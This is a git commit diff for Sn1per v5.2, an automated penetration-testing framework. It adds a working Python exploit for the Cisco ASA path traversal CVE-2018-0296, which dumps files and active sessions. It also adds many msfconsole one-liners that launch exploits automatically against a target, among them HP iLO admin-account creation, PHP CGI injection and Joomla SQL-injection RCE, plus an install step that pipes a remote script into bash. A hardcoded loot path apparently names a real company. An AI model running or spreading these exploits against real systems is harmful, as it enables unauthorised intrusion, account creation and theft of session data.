Sn1per by 1N3@CrowdShield

This commit is contained in:
WP Engine Marketing 2018-07-22 17:39:34 -07:00
parent 50ffb503ea
commit 0e6a80ba14
10 changed files with 31674 additions and 14191 deletions

View File

@ -1,4 +1,36 @@
## CHANGELOG:
* v5.2 - Added SubOver subdomain takeover scanner
* v5.2 - Added Subfinder subdomain enumeration tool
* v5.2 - Added Amass subdomain enumeration tool
* v5.2 - Added configurable modules/plugins to sniper script
* v5.2 - Added MS17-010 SMB Etternal Blue MSF Exploit
* v5.2 - Added MSF Postgresql login scanner
* v5.2 - Added passive web spider
* v5.2 - Added WebDav metasploit aux modules
* v5.2 - Added NetBIOS NMap/MSF enumeration
* v5.2 - Added SMB MSF enumeration
* v5.2 - Added NSF MSF enumeration
* v5.2 - Added SSH MSF enumeration
* v5.2 - Added BadBlue Passthru MSF exploit
* v5.2 - Added SMB GPP MSF aux module
* v5.2 - Added Intel AMT MSF scanner
* v5.2 - Added MySQL MSF scanner
* v5.2 - Added MS03-026 DCOM RCE MSF exploit
* v5.2 - Added VNC no auth MSF scanner
* v5.2 - Added FTP MSF version scanner
* v5.2 - Added FTP anonymous access MSF scanner
* v5.2 - Added MS12-020 RDP MSF scanner
* v5.2 - Added MS10-061 Spoolss MSF exploit
* v5.2 - Added MS15-034 Sys Memory Dump MSF exploit
* v5.2 - Added MS06-040 Netapi MSF exploit
* v5.2 - Added MS05-039 PNP MSF exploit
* v5.2 - Added MS12-020 Max Channels RDP scanner
* v5.2 - Added JBoss status MSF scanner
* v5.2 - Added Apache Struts 2 REST Plugin XStream RCE check
* v5.2 - Added Apache Tomcat UTF8 Traversal MSF exploit
* v5.2 - Added Apache OPTIONS Bleed MSF exploit
* v5.2 - Added HP ILO Auth Bypass MSF exploit
* v5.2 - Added Jooma Comfields SQL injection MSF exploit
* v5.1 - Added dnscan to install.sh and updated sniper references which were broken
* v5.1 - Changed default brute force list for dnscan to improve performance of scans
* v5.1 - Removed CloudHunter and SubOver references (CC. 爱上平顶山)

View File

@ -0,0 +1,61 @@
#!/usr/bin/env python
import requests
import sys
import urlparse
import os
print("""
_____ _____ _____ _____ _____ ___ _____ ___
/ __ \_ _/ ___/ __ \ _ | / _ \ / ___|/ _ \
| / \/ | | \ `--.| / \/ | | | / /_\ \\ `--./ /_\ \
| | | | `--. \ | | | | | | _ | `--. \ _ |
| \__/\_| |_/\__/ / \__/\ \_/ / | | | |/\__/ / | | |
\____/\___/\____/ \____/\___/ \_| |_/\____/\_| |_/
______ _ _ _____ _
| ___ \ | | | | |_ _| | |
| |_/ /_ _| |_| |__ | |_ __ __ ___ _____ _ __ ___ __ _| |
| __/ _` | __| '_ \ | | '__/ _` \ \ / / _ \ '__/ __|/ _` | |
| | | (_| | |_| | | | | | | | (_| |\ V / __/ | \__ \ (_| | |
\_| \__,_|\__|_| |_| \_/_| \__,_| \_/ \___|_| |___/\__,_|_|
CVE-2018-0296
Script author: Yassine Aboukir(@yassineaboukir)
""")
requests.packages.urllib3.disable_warnings()
url = sys.argv[1]
dir_path = os.path.dirname(os.path.realpath(__file__))
filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
logon = "/+CSCOE+/logon.html"
try:
is_cisco_asa = requests.get(urlparse.urljoin(url,logon), verify=False, allow_redirects=False)
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
if "webvpnLang" in is_cisco_asa.cookies:
try:
filelist_r = requests.get(urlparse.urljoin(url,filelist_dir), verify=False)
CSCOE_r = requests.get(urlparse.urljoin(url,CSCOE_dir), verify=False)
active_sessions_r = requests.get(urlparse.urljoin(url,active_sessions), verify=False)
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
if str(filelist_r.status_code) == "200":
with open(urlparse.urlparse(url).hostname+".txt", "w") as cisco_dump:
cisco_dump.write("======= Directory Index =========\n {}\n ======== +CSCEO+ Directory ========\n {}\n ======= Active sessions =========\n {}".format(filelist_r.text, CSCOE_r.text, active_sessions_r.text))
print("Vulnerable! Check the text dump saved in {}".format(dir_path))
else: print("Not vulnerable!")
else:
print("This is not Cisco ASA! E.g: https://vpn.example.com/+CSCOE+/logon.html\n")
sys.exit(1)

2
bin/report.py Normal file
View File

@ -0,0 +1,2 @@
import pdfkit
pdfkit.from_url('/usr/share/sniper/loot/workspace/hulu/sniper-report.html', 'out.pdf')

View File

@ -15,7 +15,7 @@ echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
echo ""
INSTALL_DIR=/usr/share/sniper
@ -37,7 +37,7 @@ cp -Rf * $INSTALL_DIR 2> /dev/null
cd $INSTALL_DIR
echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
apt-get install nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
apt-get install nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap jq
apt-get install waffit 2> /dev/null
pip install dnspython colorama tldextract urllib3 ipaddress requests
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
@ -78,6 +78,10 @@ pip install -r $PLUGINS_DIR/dnscan/requirements.txt
mv $INSTALL_DIR/bin/slurp.zip $PLUGINS_DIR
unzip slurp.zip
rm -f slurp.zip
cd ~/go/bin/;go get github.com/Ice3man543/SubOver; mv SubOver /usr/local/bin/subover
cd ~/go/bin;go get -u github.com/caffix/amass;mv amass /usr/local/bin/
cd ~/go/bin;go get github.com/subfinder/subfinder; mv subfinder /usr/local/bin/subfinder
cd $PLUGINS_DIR
wget https://github.com/michenriksen/aquatone/blob/master/subdomains.lst -O /usr/share/sniper/plugins/Sublist3r/subdomains.lst
wget https://raw.githubusercontent.com/1N3/IntruderPayloads/master/FuzzLists/dirbuster-quick.txt -O /usr/share/sniper/plugins/cansina/dirbuster-quick.txt
wget https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5638.nse -O /usr/share/nmap/scripts/http-vuln-cve2017-5638.nse

637
sniper
View File

@ -1,9 +1,9 @@
#!/bin/bash
# + -- --=[Sn1per by 1N3@CrowdShield
# + -- --=[http://crowdshield.com
# + -- --=[http://xerosecurity.com
#
VER="5.1"
VER="5.2"
BROWSER="firefox" # SET DEFAULT BROWSER
INSTALL_DIR="/usr/share/sniper"
PLUGINS_DIR="$INSTALL_DIR/plugins"
@ -39,6 +39,17 @@ ENABLE_AUTO_UPDATES="1"
REPORT="1"
LOOT="1"
# PLUGINS
SUBLIST3R="1"
AMASS="1"
SUBFINDER="1"
DNSCAN="1"
CRTSH="1"
SUBOVER="1"
CLOUDHUNTER="0"
SSL="1"
PASSIVE_SPIDER="1"
DISTRO=$(cat /etc/*-release | grep DISTRIB_ID= | cut -d'=' -f2)
function help {
@ -49,7 +60,7 @@ function help {
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo ""
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
echo ""
echo ' [*] NORMAL MODE'
@ -115,7 +126,7 @@ function logo {
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo ""
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
echo ""
}
@ -325,13 +336,15 @@ function loot {
cat "$a" | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" > $LOOT_DIR/reports/$a.txt
echo "$a" | aha > $LOOT_DIR/reports/$a.html 2> /dev/null
cat "$a" | aha >> $LOOT_DIR/reports/$a.html 2> /dev/null
$INSTALL_DIR/bin/pyText2pdf.py -o $LOOT_DIR/reports/$a.pdf $LOOT_DIR/reports/$a.txt 2> /dev/null > /dev/null
#$INSTALL_DIR/bin/pyText2pdf.py -o $LOOT_DIR/reports/$a.pdf $LOOT_DIR/reports/$a.txt 2> /dev/null > /dev/null
done
cd ..
echo -e "$OKORANGE + -- --=[Sorting all domains...$RESET"
touch $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/domains/*-full.txt > $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/domains/targets.txt > $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null
diff $LOOT_DIR/domains/targets-all-sorted.txt $LOOT_DIR/domains/domains-all-sorted.txt | grep \> | awk '{print $2}' > $LOOT_DIR/domains/targets-all-unscanned.txt
SNIPER_PRO=$INSTALL_DIR/pro.sh
if [ -f $SNIPER_PRO ]; then
@ -406,7 +419,7 @@ if [ "$MODE" = "discover" ]; then
fi
echo -e "$OKRED ____ /\\"
echo -e "$OKRED Sn1per by 1N3 @CrowdShield \ \\"
echo -e "$OKRED https://crowdshield.com \ \\"
echo -e "$OKRED https://xerosecurity.com \ \\"
echo -e "$OKRED ___ / \\"
echo -e "$OKRED \ \\"
echo -e "$OKRED === > [ \\"
@ -489,7 +502,7 @@ if [ "$MODE" = "webporthttp" ]; then
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[https://crowdshield.com"
echo -e "$OKORANGE + -- --=[https://xerosecurity.com"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
echo -e ""
echo -e ""
@ -569,6 +582,12 @@ if [ "$MODE" = "webporthttp" ]; then
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -Pn -T5 -p $PORT -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET
if [ "$PASSIVE_SPIDER" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -576,6 +595,11 @@ if [ "$MODE" = "webporthttp" ]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget http://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-http.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -594,11 +618,78 @@ if [ "$MODE" = "webporthttp" ]; then
echo ""
python $CMSMAP -t http://$TARGET/wordpress/
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h http://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-http-$PORT.txt
if [ "$NIKTO" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h http://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-http-$PORT.txt
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET -p $PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -692,7 +783,7 @@ if [ "$MODE" = "webporthttps" ]; then
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[https://crowdshield.com"
echo -e "$OKORANGE + -- --=[https://xerosecurity.com"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
echo -e ""
echo -e ""
@ -760,12 +851,15 @@ if [ "$MODE" = "webporthttps" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-$TARGET-https.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET
sslscan --no-failed $TARGET
echo ""
if [ "$SSL" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET | tee $LOOT_DIR/web/sslyze-$TARGET.txt 2> /dev/null
sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET.raw > $LOOT_DIR/web/sslscan-$TARGET.txt 2> /dev/null
echo ""
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -779,6 +873,12 @@ if [ "$MODE" = "webporthttps" ]; then
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -sV -T5 -Pn -p $PORT --script=http-vuln* $TARGET
if [ "$PASSIVE_SPIDER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -786,10 +886,22 @@ if [ "$MODE" = "webporthttps" ]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd --ssl -i $TARGET
clusterd --ssl -i $TARGET -p $PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -803,11 +915,85 @@ if [ "$MODE" = "webporthttps" ]; then
echo ""
python $CMSMAP -t https://$TARGET:$PORT/wordpress/
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h https://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-https-$PORT.txt
if [ "$NIKTO" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h https://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-https-$PORT.txt
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT "$PORT"; set SSL true; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -921,7 +1107,7 @@ if [ "$MODE" = "stealth" ]; then
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com"
echo -e "$OKORANGE + -- --=[http://xerosecurity.com"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
echo -e "$OKRED "
echo -e "$OKRED ./\."
@ -967,7 +1153,6 @@ if [ "$MODE" = "stealth" ]; then
if [ $SCAN_TYPE == "DOMAIN" ];
then
if [ "$OSINT" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING OSINT INFO $RESET"
@ -984,26 +1169,48 @@ if [ "$MODE" = "stealth" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
if [ "$SUBLIST3R" = "1" ]; then
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
fi
if [ "$AMASS" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
amass -whois -ip -brute -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -min-for-recursive 3 -d $TARGET 2>/dev/null
cut -d, -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
cut -d, -f2 $LOOT_DIR/domains/domains-$TARGET-amass.txt > $LOOT_DIR/domains/domains-$TARGET-amass-ips-sorted.txt
fi
if [ "$SUBFINDER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS (THIS CAN TAKE A WHILE...) $RESET"
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_DEFAULT -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
if [ "$DNSCAN" = "1" ]; then
python /pentest/recon/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
fi
echo ""
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING CERTIFICATE SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKBLUE"
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
echo ""
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
if [ "$CRTSH" = "1" ]; then
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING CERTIFICATE SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKBLUE"
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
echo ""
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
fi
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt >> /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-subfinder.txt >> /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/targets.txt >> /tmp/curl.out 2> /dev/null
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
rm -f /tmp/curl.out 2> /dev/null
@ -1028,7 +1235,9 @@ if [ "$MODE" = "stealth" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
dig $TARGET CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
